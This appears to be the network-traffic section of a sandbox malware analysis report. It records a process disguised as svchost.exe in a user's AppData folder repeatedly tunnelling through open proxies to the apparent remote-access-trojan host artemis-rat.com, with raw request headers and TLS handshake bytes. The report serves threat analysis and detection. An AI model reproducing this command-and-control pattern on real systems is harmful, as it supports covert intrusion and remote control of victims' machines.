                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.22.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1874192.168.2.555560171.250.222.13108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.923281908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1875192.168.2.555748104.21.194.198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.926584959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.080796957 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1876192.168.2.555615203.96.177.2113338243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.964023113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.677011013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.677264929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.677181005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.485908031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1877192.168.2.555638193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.985326052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1878192.168.2.555792104.25.230.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.985569000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.139981031 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1879192.168.2.555780104.16.106.658043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.985656023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.139946938 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1880192.168.2.55565618.135.133.1168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.985667944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.276886940 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:28.277415991 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a2 8b 8c c5 3a 95 8a 40 51 b4 70 58 9a 29 f2 f3 50 0c 50 be f9 21 70 c6 07 a1 26 71 9a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR:@QpX)PP!p&q*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:28.567754984 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 5b f2 25 cf 66 be 61 43 c3 4d ed 05 28 aa d8 34 92 cd 0d 15 39 9e 75 90 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9[%faCM(49uDOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:28.567805052 CET536INData Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22
                                                                                    Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
                                                                                    Mar 9, 2024 13:14:28.567866087 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 9, 2024 13:14:28.569567919 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ec 62 71 09 56 3b ad 9a a0 92 f8 b6 f1 62 8f 6a c5 df fe 8a 86 63 b7 d6 dc d4 85 2d 3e 06 15 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 df de 0c 5f cf 14 93 9a 2a 63 95 30 81 65 f1 6c 10 e2 f1 96 26
                                                                                    Data Ascii: %! bqV;bjc->P(_*c0el&D`yi
                                                                                    Mar 9, 2024 13:14:29.192483902 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ec 62 71 09 56 3b ad 9a a0 92 f8 b6 f1 62 8f 6a c5 df fe 8a 86 63 b7 d6 dc d4 85 2d 3e 06 15 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 df de 0c 5f cf 14 93 9a 2a 63 95 30 81 65 f1 6c 10 e2 f1 96 26
                                                                                    Data Ascii: %! bqV;bjc->P(_*c0el&D`yi
                                                                                    Mar 9, 2024 13:14:29.464409113 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 5b f2 25 cf 66 be 61 43 c3 4d ed 05 28 aa d8 34 92 cd 0d 15 39 9e 75 90 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9[%faCM(49uDOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:29.481353998 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 19 d3 49 63 ca 97 4b da 1c 74 de 4f e2 df 10 46 cf c3 d7 7d e3 3e 42 bf 00 91 6a e8 4e 39 7d 7b e5 eb 75 59 ef cd 23 d2
                                                                                    Data Ascii: (IcKtOF}>BjN9}{uY#


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1881192.168.2.555800104.19.225.708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.987445116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.141761065 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1882192.168.2.555801172.67.181.1368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.987716913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.142196894 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1883192.168.2.555603103.49.114.195808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.988004923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1884192.168.2.555571203.188.245.985283743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.996282101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1885192.168.2.55578552.13.248.29312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.004621983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.197791100 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1886192.168.2.555679128.140.26.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.015547991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1887192.168.2.55570146.17.63.166948043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.026609898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.322856903 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1888192.168.2.55570552.16.232.164312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.032847881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.336133003 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1889192.168.2.555831104.20.233.708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.041192055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.195708990 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1890192.168.2.55571488.198.82.189312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.050112963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.364538908 CET92INHTTP/1.0 200 Connection established
                                                                                    Proxy-agent: Kerio Control/9.4.2 patch 1 build 7290


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1891192.168.2.55602836.94.2.13844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.054208994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1892192.168.2.55602936.94.2.13844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.054902077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1893192.168.2.55584345.12.31.38043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.055028915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.209604025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
